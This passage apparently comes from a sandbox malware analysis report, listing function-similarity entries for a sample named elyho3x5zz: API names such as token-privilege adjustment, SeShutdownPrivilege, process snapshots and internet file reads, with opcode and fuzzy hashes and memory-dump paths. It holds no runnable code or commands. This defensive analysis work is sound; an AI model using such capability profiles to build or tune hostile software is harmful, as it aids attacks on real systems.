      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: CurrentProcess_invalid_parameter_noinfo
      • String ID: *$.$.
      • API String ID: 2518042432-2112782162
      • Opcode ID: 10686662bc6c287608bb1927b489f0d8a7225314f89d29ff6f04aab4d96db585
      • Instruction ID: ca0cc3209edef1017632225a997f1f582aff229106e7824680439a4da3f705b9
      • Opcode Fuzzy Hash: 10686662bc6c287608bb1927b489f0d8a7225314f89d29ff6f04aab4d96db585
      • Instruction Fuzzy Hash: 4451F366F10B5595FB14EBA5D8026BDA7A4FB84BC8F944535EE0D17B84DE3CE042A320
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _get_daylight$_invalid_parameter_noinfo
      • String ID:
      • API String ID: 1286766494-0
      • Opcode ID: ff66785d1f33ad73d5007bcee94c477568ce16377581ab8ae86a17e1b75de420
      • Instruction ID: 804353143441f709890cd157d52641cdd6285a09b32a8c05c5980401316663ca
      • Opcode Fuzzy Hash: ff66785d1f33ad73d5007bcee94c477568ce16377581ab8ae86a17e1b75de420
      • Instruction Fuzzy Hash: 0FA2E13BA086469AF724EF24D49217AB7A1FB84788F944171DB8D03B98DF3DD411B722
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: System$AdjustErrorExitInitiateLastLookupPowerPrivilegePrivilegesShutdownStateTokenValueWindows
      • String ID: SeShutdownPrivilege
      • API String ID: 2163645468-3733053543
      • Opcode ID: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
      • Instruction ID: f4c91ba5295f4e42739826d78e2a8373b3525d4be1f5acfb8b437e0c2927e4d1
      • Opcode Fuzzy Hash: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
      • Instruction Fuzzy Hash: E6119136B1861292F724EB25A84216EE352BFC4B50F894275F54D83AD9EF3CD805B750
      APIs
      Strings
      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF73A1F5C43
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: DebugDebuggerErrorLastOutputPresentString
      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
      • API String ID: 389471666-631824599
      • Opcode ID: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
      • Instruction ID: 8d481ff16d885fdb0cabab6297d7de0cb8953be8bd7ca8f155d1c00e70679d4c
      • Opcode Fuzzy Hash: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
      • Instruction Fuzzy Hash: 9511423A615782A7F704AB22E556379B3B8FB84355F804275D74E82950DF3CE064E720
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: AddressLibraryLoadProc
      • String ID: GetNativeSystemInfo$kernel32.dll
      • API String ID: 2574300362-192647395
      • Opcode ID: 9c402017b67deeecdf71e3c2df55c45970ec8440a50b34eba4d95c6c8b29e614
      • Instruction ID: 6b0597556fdb2d41509643b07a2336c6c40aa4b8b29a84619c063d3d6520bcec
      • Opcode Fuzzy Hash: 9c402017b67deeecdf71e3c2df55c45970ec8440a50b34eba4d95c6c8b29e614
      • Instruction Fuzzy Hash: 1EE01269905B06A1FF14AB50E41636863E4FB88B48FC40475D91D45390EFBCE5A4F350
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Init_thread_footer
      • String ID: Variable must be of type 'Object'.
      • API String ID: 1385522511-109567571
      • Opcode ID: 09b0c8642434f20ce4b814200726c115a0bcc0e38a9d6de865f3abdb52dfbc80
      • Instruction ID: 71d9ea997612e73196bcc03c70c2ec931fd0497f60db5fe7a388176e808232ae
      • Opcode Fuzzy Hash: 09b0c8642434f20ce4b814200726c115a0bcc0e38a9d6de865f3abdb52dfbc80
      • Instruction Fuzzy Hash: E6C2C43AA0868692FB64EF15E4426B9B7B1FB94B84F845171DA4E477A4CF3CE481F310
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
      • String ID:
      • API String ID: 1083639309-0
      • Opcode ID: 7d0614c687471f8f56d90fca436f6d5e63647f58946659d2de1ab8f7fc1a559c
      • Instruction ID: 2ba9981e6e8e08f9268f947741ebb29365acc81f8a68865ebd36f6654f9d45f0
      • Opcode Fuzzy Hash: 7d0614c687471f8f56d90fca436f6d5e63647f58946659d2de1ab8f7fc1a559c
      • Instruction Fuzzy Hash: FA418E2AA18A92A5FB10FB61E4821BEB374FB84B84FD44072FA4E43655DF7CE505E710
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID:
      • String ID: DEFINE$x
      • API String ID: 0-4035502692
      • Opcode ID: ef8c6a1001600b964e5fbe2637a07538f3dd4599c6cbe193d186c423f91508d7
      • Instruction ID: 53dbc4195e1a44f3de39780255e194aa6e4eca5d8b3c1a7650e09a9ba3ecf9b5
      • Opcode Fuzzy Hash: ef8c6a1001600b964e5fbe2637a07538f3dd4599c6cbe193d186c423f91508d7
      • Instruction Fuzzy Hash: 0953AC3AF046929AF760DF25C4416BC77A1FB85B88F908176CE4D57B84EB3AE841E710
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Init_thread_footer
      • String ID:
      • API String ID: 1385522511-0
      • Opcode ID: 60f9666ca451ed35fe8ab7f9d9e10171ddfa37ac04d0aa9f8a10e9c9a443c8f8
      • Instruction ID: 8d86efe83e4384bc60b79a32ac2da8ad0938f3a4a85a96a3f90ac81cc929433b
      • Opcode Fuzzy Hash: 60f9666ca451ed35fe8ab7f9d9e10171ddfa37ac04d0aa9f8a10e9c9a443c8f8
      • Instruction Fuzzy Hash: E382923AA08A42A6FB54EF15E446A79B3B4FBA4B84F904071DA4E47794DF3DE441F320
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID:
      • String ID: $[$\
      • API String ID: 0-3681541464
      • Opcode ID: f7681cbd2ea07fa149fa3418819e144fbe1fe0a990a0ed3c69471eaae0dbb131
      • Instruction ID: 6a9344bf76e845553065b594ecdfed420ce63de5e1457b448b2434ec79b022f8
      • Opcode Fuzzy Hash: f7681cbd2ea07fa149fa3418819e144fbe1fe0a990a0ed3c69471eaae0dbb131
      • Instruction Fuzzy Hash: 2EB2CE3AF056929AFB64DF65C4416AC77B1FB46748F904176CE0D57B88EB39E800EB10
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: memcpy_s
      • String ID:
      • API String ID: 1502251526-0
      • Opcode ID: 4319a682b676806559ada1e1e2a537e8d5e8e6a4cd1916f84ce5e893799bb061
      • Instruction ID: 65a5dedb86ccfe9c7e4a319d136df8c419b5596c0e6aa2eac76e8d6e41c2709b
      • Opcode Fuzzy Hash: 4319a682b676806559ada1e1e2a537e8d5e8e6a4cd1916f84ce5e893799bb061
      • Instruction Fuzzy Hash: C1D1C436B1828697EB24DF15E18566AF7A1FBC8784F948134DB8E53B44DB3CE941EB00
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Find$File$CloseFirstNext
      • String ID:
      • API String ID: 3541575487-0
      • Opcode ID: 8095db4ae0d7967ea6bb3d0986d3fec5b3e30099e78eeea076049f78ea6c2b13
      • Instruction ID: 1a3adbfdd298b4e85125e58d8150160ff5850bec1d5345388067466c4fce98a2
      • Opcode Fuzzy Hash: 8095db4ae0d7967ea6bb3d0986d3fec5b3e30099e78eeea076049f78ea6c2b13
      • Instruction Fuzzy Hash: 0851AD7A608A42A5EB14EF25E0812ACF760FB84B94F844272DF5E437A5CF3CD550E710
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue
      • String ID:
      • API String ID: 1766415185-0
      • Opcode ID: bd9ee305005d20edf5c11873021be34db603942109d79114471410cc239d0158
      • Instruction ID: 9b25d620effe1d808b1d86c19749329aa0516672df112ba643a89cd642b07c2c
      • Opcode Fuzzy Hash: bd9ee305005d20edf5c11873021be34db603942109d79114471410cc239d0158
      • Instruction Fuzzy Hash: BD21217BA08A11A6FB10EF11E4062AAA7A5FB88B84FC64531CF5D03280CF3DE445E360
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: CloseControlCreateDeviceFileHandle
      • String ID:
      • API String ID: 33631002-0
      • Opcode ID: c1a660ba6107f8f40afc549c60c0281f1e634fa1b65154c4abfb297250e0dda3
      • Instruction ID: 21af695ecbe90b0ba605252ca09e2c823016fe489a5fc1b8cad67d1b7a3e1f3d
      • Opcode Fuzzy Hash: c1a660ba6107f8f40afc549c60c0281f1e634fa1b65154c4abfb297250e0dda3
      • Instruction Fuzzy Hash: C8219D776187809BE3508F15E08939AB7A4F385BA0F508235DB9C43B98DF7CC859DB40
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID:
      • String ID: .
      • API String ID: 0-248832578
      • Opcode ID: e1d1fb4f290d3f8f73012e05781d19b6c344ca2143228aded1dc3f30a5d54e4e
      • Instruction ID: 43996ecaf2f1f3d57b0cda56ce2bd2f0cf055da5bed5d9232d9a2c62bf464208
      • Opcode Fuzzy Hash: e1d1fb4f290d3f8f73012e05781d19b6c344ca2143228aded1dc3f30a5d54e4e
      • Instruction Fuzzy Hash: 02313819B1469165FB70AF229C06AB6E691FB90BE4F948631FE5D07BC4DE3CD401A710
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: ExceptionRaise_clrfp
      • String ID:
      • API String ID: 15204871-0
      • Opcode ID: 2c887139cc1f69395780bda7c312862f1bbc48349006177215bd8e385e5acab5
      • Instruction ID: 96bce782cafbf1c23049be70385253116f52c0c9a6f32d1776f2ddf7e371a443
      • Opcode Fuzzy Hash: 2c887139cc1f69395780bda7c312862f1bbc48349006177215bd8e385e5acab5
      • Instruction Fuzzy Hash: 59B17B77600B888BEB19DF29C84636C7BA0F784B48F598861DB9D837A4CB3DD451E710
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Internet$AvailableDataFileQueryRead
      • String ID:
      • API String ID: 599397726-0
      • Opcode ID: a54c6d4a74e6411871131af3bdbcf589181ad988d0891215d2ce77e29c03cb3f
      • Instruction ID: 70a84769c891ccd41716bebcd8da0439fffc285760b343d5e598f7a77b26b157
      • Opcode Fuzzy Hash: a54c6d4a74e6411871131af3bdbcf589181ad988d0891215d2ce77e29c03cb3f
      • Instruction Fuzzy Hash: 0831D07AB08A0296FF18EE36D4527B8A3A1FBC4BC8F904435DE0D47B98DE38D441A310
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Find$CloseFileFirst
      • String ID:
      • API String ID: 2295610775-0
      • Opcode ID: c9c219a70f1c370a867d1a9527945e6bdb48ca94d3a7acfc6404a472547bc866
      • Instruction ID: d3d693524a8f623c7c89a6584e4d7a5d5107a19d7bd9c9a85c24b153730ecd79
      • Opcode Fuzzy Hash: c9c219a70f1c370a867d1a9527945e6bdb48ca94d3a7acfc6404a472547bc866
      • Instruction Fuzzy Hash: BB117C76B0874196EB00EF26E08536CB760FB98BA0F458671EA6D47B91CF7CD4519710
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: ErrorFormatLastMessage
      • String ID:
      • API String ID: 3479602957-0
      • Opcode ID: a2008fc71fb315c0dad007a4b51d1fe3c27baf42b183b088b3737ee8cb1df6e2
      • Instruction ID: f22020b5d3a7b0e4997659e743748863f1b6b90408033382f3e3b864c7619b6e
      • Opcode Fuzzy Hash: a2008fc71fb315c0dad007a4b51d1fe3c27baf42b183b088b3737ee8cb1df6e2
      • Instruction Fuzzy Hash: A0F0C866A08642A5F7206B15F84166AF7A5FFC97D4F905134FB9D43B99DE3CC004AB10
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: AdjustCloseHandlePrivilegesToken
      • String ID:
      • API String ID: 81990902-0
      • Opcode ID: 2696843c0c1c48d019296e0beaf727179f08331fefa667d0a626b5bdda81ebd6
      • Instruction ID: a012bff2d61e5a49f8384bd08278358037bd1fe4886e817af369ee578057e1e1
      • Opcode Fuzzy Hash: 2696843c0c1c48d019296e0beaf727179f08331fefa667d0a626b5bdda81ebd6
      • Instruction Fuzzy Hash: 2DF0E56AA18A4682FB50EB21E4163B89360FBDCF88F601531CF0D47754CF3CC086B220
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo
      • String ID: 0$0x%p
      • API String ID: 3215553584-2479247192
      • Opcode ID: 2cf1ea9a671600e4e0a2c177b28b5012e25eeeeabff85c4abdd8ee56160d1f52
      • Instruction ID: f5f9040080968d670f0f7d56e3c10e7db1353adef07033c01c59c55683534209
      • Opcode Fuzzy Hash: 2cf1ea9a671600e4e0a2c177b28b5012e25eeeeabff85c4abdd8ee56160d1f52
      • Instruction Fuzzy Hash: 8E814A19B1E28362FA64AA15A04A5BDA3F0EF40744FD417B1DF0D876A5CF2DE802F720
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
